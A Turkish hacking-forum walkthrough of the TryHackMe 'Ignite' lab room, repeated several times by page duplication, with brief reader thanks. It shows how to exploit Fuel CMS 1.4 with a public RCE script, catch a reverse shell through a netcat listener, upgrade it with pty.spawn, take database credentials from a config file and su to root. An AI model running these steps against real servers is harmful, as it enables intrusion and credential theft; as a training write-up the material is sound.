TryHackMe Ignite Odası Walkthrough | Detaylı Anlatım

ACE Veen · 25 Kas 2023

Merhaba Arkadaşlar, Bugün size TryHackMe'den "Ignite" odasının çözümünü göstereceğim. Umarım keyifli bir makale olur. İyi okumalar!

Link: TryHackMe | Ignite

Görev 1) "Root İt"

User.txt

İlk olarak verilen IP adresini internet tarayıcımızda açalım ve karşımıza çıkan siteye bakalım.

Yukarıda gördüğünüz üzere sitede Fuel CMS adında bir script kullanılıyor ve bu scriptin sürümüde 1.4. İnternette “Fuel CMS Version 1.4” diye aratınca karşımıza birden çok sonuç çıkıyor fakat bizim işimiz siteyi hacklemek olduğu için “Exploit” dışındaki sonuçları umursamıyoruz.

İsterseniz, Exploit-DB sitesindeki exploiti kullanabilirsiniz, ancak GitHub'daki - yani ikinci sıradaki - exploit, işimize daha çok yarayacaktır. (

GitHub - ice-wzl/Fuel-1.4.1-RCE-Updated

Contribute to ice-wzl/Fuel-1.4.1-RCE-Updated development by creating an account on GitHub.

github.com

)

Exploiti indirdikten sonra terminali açıp exploiti indirdiğimiz konuma gidelim. Ardından "nc -lvn <PORT>" yazıp Enter tuşuna basalım ve CTRL+T ile yeni bir terminal sekmesi açalım. Yeni terminal sekmesinde "python3 Fuel-Updated.py http://<URL> <YOUR_IP_ADDRESS> <PORT>" komutunu yazıp Enter tuşuna basalım. (nc -lvn komutunda porta 1881 girdiyseniz Fuel-Updated.py’dede 1881 girmelisiniz!)

NetCat bağlantımız geldikten sonra “export TERM=xterm” yazalım. “python -c 'import pty; pty.spawn("/bin/sh")'” komutu ile daha geniş yetkilere sahip bir shell elde edelim. User Flag’ını okumak için “cat /home/www-data/flag.txt” yazabiliriz.

Flag'i bulduktan sonra, TryHackMe platformundaki "User.txt"nin altındaki giriş alanına flag'inizi yazabilirsiniz.

Root.txt

Bu flag’i bulmak için makineyi rootlamamız gerek.

Zaten burada, dolaylı yoldan ne yapmanız gerektiğini söylemiş. (Anasayfada aşağı kaydırırsanız göreceksiniz.) Şimdi yapmamız gereken şey terminalde şu komutu girmek: "cd fuel/application/config && cat database.php". Komutu yazdıktan sonra karşımıza "database.php" dosyasının içeriğini gösterecektir ve dosyanın içinde kullanıcı adı (username) ve şifre (password) bilgileri bulunmaktadır.

Eğer terminalde "su" komutunu yazarsak, bize bir şifre soracaktır ve şifre, gördüğünüz gibi "mememe"dır. Son olarak, "cat /root/root.txt" komutunu yazarsak, root.txt dosyasının içeriğini okuyacak ve flag'ı bize verecektir.

Okuduğunuz için teşekkür ederim. Başka bir konuda veya soruda yardıma ihtiyacınız olursa her zaman buradayım. İyi çalışmalar!

Grey Hat Kulübü CTF Çözümleri # 1

Walkthrough by ACEVeen

www.turkhackteam.org

hoaydar · 25 Kas 2023

Eline sağlık güzel bir konu olmuş

Suppressor · 25 Kas 2023

Eline sağlık.

'Atlas · 25 Kas 2023

Eline sağlık.

ACE Veen · 26 Kas 2023

hoaydar' Alıntı:
Eline sağlık güzel bir konu olmuş

Suppressor' Alıntı:
Eline sağlık.

H@cked BaBy' Alıntı:
Eline sağlık.

teşekkür ederim

TryHackMe Ignite Odası Walkthrough | Detaylı Anlatım

ACE Veen

Uzman üye

Merhaba Arkadaşlar, Bugün size TryHackMe'den "Ignite" odasının çözümünü göstereceğim. Umarım keyifli bir makale olur. İyi okumalar!

Görev 1) "Root İt"

User.txt

İlk olarak verilen IP adresini internet tarayıcımızda açalım ve karşımıza çıkan siteye bakalım.

İsterseniz, Exploit-DB sitesindeki exploiti kullanabilirsiniz, ancak GitHub'daki - yani ikinci sıradaki - exploit, işimize daha çok yarayacaktır. (

GitHub - ice-wzl/Fuel-1.4.1-RCE-Updated

Contribute to ice-wzl/Fuel-1.4.1-RCE-Updated development by creating an account on GitHub.

github.com

)

GitHub - ice-wzl/Fuel-1.4.1-RCE-Updated

NetCat bağlantımız geldikten sonra “export TERM=xterm” yazalım. “python -c 'import pty; pty.spawn("/bin/sh")'” komutu ile daha geniş yetkilere sahip bir shell elde edelim. User Flag’ını okumak için “cat /home/www-data/flag.txt” yazabiliriz.

Flag'i bulduktan sonra, TryHackMe platformundaki "User.txt"nin altındaki giriş alanına flag'inizi yazabilirsiniz.

Root.txt

Bu flag’i bulmak için makineyi rootlamamız gerek.

Eğer terminalde "su" komutunu yazarsak, bize bir şifre soracaktır ve şifre, gördüğünüz gibi "mememe"dır. Son olarak, "cat /root/root.txt" komutunu yazarsak, root.txt dosyasının içeriğini okuyacak ve flag'ı bize verecektir.

Okuduğunuz için teşekkür ederim. Başka bir konuda veya soruda yardıma ihtiyacınız olursa her zaman buradayım. İyi çalışmalar!

Grey Hat Kulübü CTF Çözümleri # 1

Walkthrough by ACEVeen

www.turkhackteam.org

hoaydar

Senior Hunter

Suppressor

Uzman üye

'Atlas

Kıdemli Üye

ACE Veen

Uzman üye

Sosyal medya sayfalarımız

TryHackMe Ignite Odası Walkthrough | Detaylı Anlatım

ACE Veen

Uzman üye

Merhaba Arkadaşlar, Bugün size TryHackMe'den "Ignite" odasının çözümünü göstereceğim. Umarım keyifli bir makale olur. İyi okumalar!​

Görev 1) "Root İt"​

User.txt​

İlk olarak verilen IP adresini internet tarayıcımızda açalım ve karşımıza çıkan siteye bakalım.​

​

İsterseniz, Exploit-DB sitesindeki exploiti kullanabilirsiniz, ancak GitHub'daki - yani ikinci sıradaki - exploit, işimize daha çok yarayacaktır. ( GitHub - ice-wzl/Fuel-1.4.1-RCE-Updated Contribute to ice-wzl/Fuel-1.4.1-RCE-Updated development by creating an account on GitHub. github.com )​

GitHub - ice-wzl/Fuel-1.4.1-RCE-Updated

NetCat bağlantımız geldikten sonra “export TERM=xterm” yazalım. “python -c 'import pty; pty.spawn("/bin/sh")'” komutu ile daha geniş yetkilere sahip bir shell elde edelim. User Flag’ını okumak için “cat /home/www-data/flag.txt” yazabiliriz.​

​

Flag'i bulduktan sonra, TryHackMe platformundaki "User.txt"nin altındaki giriş alanına flag'inizi yazabilirsiniz.​

Root.txt​

Bu flag’i bulmak için makineyi rootlamamız gerek.​

​

Eğer terminalde "su" komutunu yazarsak, bize bir şifre soracaktır ve şifre, gördüğünüz gibi "mememe"dır. Son olarak, "cat /root/root.txt" komutunu yazarsak, root.txt dosyasının içeriğini okuyacak ve flag'ı bize verecektir.​

​

Okuduğunuz için teşekkür ederim. Başka bir konuda veya soruda yardıma ihtiyacınız olursa her zaman buradayım. İyi çalışmalar!​

​

Grey Hat Kulübü CTF Çözümleri # 1​

​

Walkthrough by ACEVeen​

​

www.turkhackteam.org​

hoaydar

Senior Hunter

Suppressor

Uzman üye

'Atlas

Kıdemli Üye

ACE Veen

Uzman üye

Merhaba Arkadaşlar, Bugün size TryHackMe'den "Ignite" odasının çözümünü göstereceğim. Umarım keyifli bir makale olur. İyi okumalar!

Görev 1) "Root İt"

User.txt

İlk olarak verilen IP adresini internet tarayıcımızda açalım ve karşımıza çıkan siteye bakalım.

NetCat bağlantımız geldikten sonra “export TERM=xterm” yazalım. “python -c 'import pty; pty.spawn("/bin/sh")'” komutu ile daha geniş yetkilere sahip bir shell elde edelim. User Flag’ını okumak için “cat /home/www-data/flag.txt” yazabiliriz.

Flag'i bulduktan sonra, TryHackMe platformundaki "User.txt"nin altındaki giriş alanına flag'inizi yazabilirsiniz.

Root.txt

Bu flag’i bulmak için makineyi rootlamamız gerek.

Eğer terminalde "su" komutunu yazarsak, bize bir şifre soracaktır ve şifre, gördüğünüz gibi "mememe"dır. Son olarak, "cat /root/root.txt" komutunu yazarsak, root.txt dosyasının içeriğini okuyacak ve flag'ı bize verecektir.

Okuduğunuz için teşekkür ederim. Başka bir konuda veya soruda yardıma ihtiyacınız olursa her zaman buradayım. İyi çalışmalar!

Grey Hat Kulübü CTF Çözümleri # 1

Walkthrough by ACEVeen

www.turkhackteam.org